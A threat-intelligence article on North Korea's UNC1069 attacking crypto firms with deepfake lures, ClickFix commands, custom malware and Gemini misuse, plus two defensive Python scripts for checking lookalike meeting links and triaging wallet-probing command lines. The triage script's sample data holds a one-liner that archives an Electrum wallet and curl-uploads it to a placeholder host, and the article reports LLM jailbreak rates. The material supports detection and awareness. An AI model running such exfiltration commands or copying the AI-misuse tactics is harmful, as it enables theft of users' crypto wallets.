North Korean UNC1069 Hackers Escalate Crypto Attacks with AI Deepfakes and Custom Malware
North Korean-linked threat actors, tracked as UNC1069, have intensified their assaults on the cryptocurrency sector using advanced AI-driven social engineering and novel malware tooling, according to a recent investigation by Google’s Mandiant threat intelligence team.[1]
The group, active since at least 2018 and suspected of ties to Pyongyang, has shifted focus since 2023 from traditional finance to Web3 targets including centralized exchanges, DeFi developers, venture capital firms, and high-tech companies.[1] In a recent intrusion targeting a FinTech entity, UNC1069 deployed seven unique malware families, including new tools like SILENCELIFT, DEEPBREATH, and CHROMEPUSH designed to harvest host and victim data.[1]
Sophisticated Social Engineering Tactics
UNC1069’s operations blend current tradecraft with psychological manipulation. In one documented case, actors impersonated industry professionals on platforms such as Telegram, built rapport, and then sent spoofed Calendly links that led to fake Zoom meetings hosted on attacker-controlled domains such as zoom[.]uswe05[.]us (the registered domain here is uswe05[.]us; “zoom” is only a subdomain).[1] Victims were then directed to run so-called “ClickFix” commands, in which a fake error or troubleshooting prompt tells the user to paste a command into a terminal or run dialog; executing it deployed the malware.[1]
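The link-verification practice this implies can be automated: decide on the registrable domain rather than on whether a host merely contains the brand name. The following is an added example written for this article, not code from the report or from Google/Mandiant; the brand-to-domain table and the two-label domain split are simplifying assumptions, and it also handles Calendly links and defanged indicators, which the case above does not spell out.

```python
"""Meeting-link brand check (added example, not code from the report or Google/Mandiant).

A lookalike such as zoom[.]uswe05[.]us places the brand name in a subdomain of an
unrelated registrable domain (uswe05.us). Deciding on the registrable domain, not
on whether the host merely contains "zoom", is what exposes it.
"""
from urllib.parse import urlsplit

# Assumption: registrable domains that legitimately host each brand's links.
# Illustrative only; keep such a table current from vendor documentation.
BRAND_DOMAINS = {
    "zoom": {"zoom.us", "zoom.com"},
    "calendly": {"calendly.com"},
}


def registrable_domain(host: str) -> str:
    """Return the last two labels of a host name.

    Adequate for .us/.com/.net; production code should consult the Public
    Suffix List (e.g. the tldextract package) so that brand.co.uk-style hosts
    are split correctly.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_meeting_link(url: str) -> dict:
    """Classify a meeting or scheduling URL by the brand it claims versus the domain it uses.

    verdict values:
      'ok'        registrable domain belongs to the brand named in the host
      'lookalike' brand name (or a punycode label) present, but on another domain
      'unknown'   no brand cue at all; route to manual review
      'invalid'   no host could be parsed
    """
    # Threat reports defang indicators as hxxp:// and [.]; normalise before parsing.
    clean = url.replace("[.]", ".").replace("hxxp", "http")
    if "://" not in clean:
        clean = "https://" + clean
    host = (urlsplit(clean).hostname or "").lower()
    result = {"url": url, "host": host, "brand": None}
    if not host:
        return {**result, "verdict": "invalid"}

    reg = registrable_domain(host)
    claimed = [brand for brand in BRAND_DOMAINS if brand in host]
    for brand in claimed:
        if reg in BRAND_DOMAINS[brand]:
            return {**result, "brand": brand, "verdict": "ok"}
    if claimed or "xn--" in host:  # brand on a foreign domain, or IDN homograph risk
        return {**result, "brand": claimed[0] if claimed else None, "verdict": "lookalike"}
    return {**result, "verdict": "unknown"}


if __name__ == "__main__":
    for link in ("https://us02web.zoom.us/j/1234567890",
                 "hxxps://zoom[.]uswe05[.]us/j/1234567890",
                 "https://calendly.com/someone/30min"):
        print(classify_meeting_link(link))
```

A verdict of "unknown" is deliberately not "ok": a meeting link with no brand cue at all is exactly the kind that a rapport-building contact would send, and it should go to a human rather than be auto-approved.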
The group has pioneered AI-enhanced lures, including deepfake images and videos impersonating crypto executives, to distribute the BIGMACHO backdoor. These campaigns often prompt targets to install a fake “Zoom SDK,” and the contact itself yields open-source intelligence (OSINT) for follow-on attacks. In one case the executive whose profile was impersonated confirmed that the account had been taken over, showing how far the reconnaissance extends.[1]

AI Weaponization in Malware and Operations
Google’s Threat Intelligence Group (GTIG) reported UNC1069, also tracked as Masan, abusing models such as Gemini to look up where cryptocurrency wallet applications store their data and to generate phishing scripts.[3][4] This is a novel use of large language models (LLMs) during attack execution: the operators prompted the model to respond as a system “Administrator” and had it craft one-liner commands for data exfiltration, folder creation, and hardware reconnaissance.[4]
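Those one-liners are detectable on the endpoint because they bundle behaviours that rarely co-occur in legitimate developer activity. The following triage script is an added example written for this article, not code from the report or from Google/Mandiant; the wallet names, recon commands and upload flags it matches are illustrative assumptions rather than a vendor signature set, and the process events are constructed.

```python
"""Wallet-probe triage over process command lines (added example, not code from the report or Google/Mandiant).

The LLM-generated one-liners described above combine enumeration of wallet data
locations, hardware reconnaissance, and staging/exfiltration of the results.
Scoring each command line for those signals, rather than alerting on any one
string, keeps the alert volume manageable. The indicator lists are illustrative
assumptions, not a vendor signature set.
"""
import re

# Assumption: wallet application names and data paths worth watching.
WALLET_RE = re.compile(
    r"(exodus|electrum|ledger live|metamask|phantom|wallet\.dat|\.bitcoin|"
    r"local extension settings)",
    re.IGNORECASE,
)
# Hardware/OS reconnaissance commands on macOS, Linux and Windows.
RECON_RE = re.compile(
    r"(system_profiler|\bsysctl\s+hw|\blscpu\b|\bdmidecode\b|\bwmic\s+(cpu|baseboard|bios)\b)",
    re.IGNORECASE,
)
# Staging: archive creation, or a hidden working directory under a shared path.
STAGE_RE = re.compile(
    r"(\btar\s+-?\S*c\S*|\bzip\s+-r|\b7z\s+a\b|\bmkdir\s+(-p\s+)?\S*/\.\w)",
    re.IGNORECASE,
)
# Exfiltration: curl/wget invoked with an upload option in the same command.
EXFIL_RE = re.compile(
    r"\b(curl|wget)\b[^|;&]*(-F\s|-T\s|--upload-file|--data-binary|-d\s*@|--post-file)",
    re.IGNORECASE,
)

# Constructed sample process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "mac-dev-01", "user": "alice", "cmdline": "git status"},
    {"host": "mac-dev-01", "user": "alice", "cmdline": "open -a Exodus"},
    {"host": "mac-dev-02", "user": "bob",
     "cmdline": "find ~/Library/Application\\ Support -maxdepth 1 -name Exodus "
                "-o -name Electrum; system_profiler SPHardwareDataType"},
    {"host": "mac-dev-02", "user": "bob",
     "cmdline": "mkdir -p /tmp/.w && cp -r ~/.electrum /tmp/.w && "
                "tar czf /tmp/w.tgz /tmp/.w && "
                'curl -s -F "f=@/tmp/w.tgz" https://upload.example.invalid/'},
]


def score_cmdline(cmdline: str) -> dict:
    """Return the signals present in one command line and a severity.

    high:   wallet location touched and staged or uploaded in the same command
    medium: wallet location touched alongside hardware reconnaissance
    low:    wallet location or upload alone (e.g. a user opening their own wallet)
    none:   nothing of interest
    """
    signals = {
        "wallet": bool(WALLET_RE.search(cmdline)),
        "recon": bool(RECON_RE.search(cmdline)),
        "staging": bool(STAGE_RE.search(cmdline)),
        "exfil": bool(EXFIL_RE.search(cmdline)),
    }
    if signals["wallet"] and (signals["exfil"] or signals["staging"]):
        severity = "high"
    elif signals["wallet"] and signals["recon"]:
        severity = "medium"
    elif signals["wallet"] or signals["exfil"]:
        severity = "low"
    else:
        severity = "none"
    return {"severity": severity, "signals": [k for k, v in signals.items() if v]}


def triage(events: list) -> list:
    """Score every event and return the ones worth a look, most severe first."""
    rank = {"high": 0, "medium": 1, "low": 2}
    alerts = []
    for event in events:
        verdict = score_cmdline(event["cmdline"])
        if verdict["severity"] != "none":
            alerts.append({**event, **verdict})
    alerts.sort(key=lambda a: rank[a["severity"]])
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["severity"], alert["user"], alert["signals"], alert["cmdline"][:60])
```

The scoring is per command line on purpose: the reported tradecraft packs enumeration, staging and upload into a single one-liner, so the signals land in one process-creation event. A developer who merely launches a wallet scores "low" and can be suppressed, while the same wallet path next to an archive-and-upload chain scores "high".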
Source [5] credits UNC1069 with the first fully multi-modal AI-enabled attack, combining AI-generated Spanish text for social engineering, deepfake video for visual verification, and voice synthesis for phone-based checks, thereby overcoming language and trust barriers when targeting crypto executives.[5] In the same source’s tests, jailbreak success rates against open-weight models reached 92.78%, highlighting the weakness of safeguards in models such as Mistral Large-2.[5]
Experimental malware such as PromptFlux calls the Gemini API to rewrite its own code hourly for evasion, while PromptLock has an LLM generate Lua scripts on the fly; [7] reports these techniques being picked up by nation-state actors.[7]
Part of a Larger DPRK Cyber Campaign
UNC1069 is one of several North Korean clusters plundering crypto. UNC4899 and UNC5342 use fake job lures against Web3 developers; UNC4736 was behind the 2023 3CX supply chain compromise, which itself began with a trojanized trading application and was used to reach cryptocurrency firms; and UNC3782 stole $137 million from TRON users in a single day in 2023 before turning to Solana with wallet drainers.[2][6] UNC5267 places DPRK IT workers, operating under false identities from China and Russia, into remote positions at target firms.[2]
| Cluster | Active Since | Primary Tactics | Notable Incidents |
|---|---|---|---|
| UNC1069 | 2018 | AI social engineering, deepfakes, ClickFix | FinTech intrusion, BIGMACHO backdoor |
| UNC3782 | 2023 | Phishing, drainers | $137M TRON theft |
| UNC4736 | 2022 | Supply chain | 3CX attack |
These efforts fund North Korea’s weapons programs amid sanctions, with DPRK actors crafting tools in Golang, C++, and Rust for cross-platform infections.[2][8] In 2025, operations grew more patient, targeting high-value “big fish” for bigger payouts.[8]
Industry Response and Implications
Google has blocked the abusing accounts and strengthened model safeguards, but experts warn that AI misuse is escalating, from code obfuscation to multi-modal operations.[3][7] “North Korean actors are actively developing new ways to use AI in cyberattacks,” Mandiant noted.[4]
Crypto firms are urged to train staff to recognize deepfakes, to verify that meeting and scheduling links resolve to the vendor’s real domains, to treat any “paste this command to fix your call” prompt as an intrusion attempt, and to monitor endpoint telemetry for commands that enumerate wallet data directories. As AI lowers the barrier to sophisticated attacks, the sector faces a new era of hybrid threats that blend human cunning with machine assistance.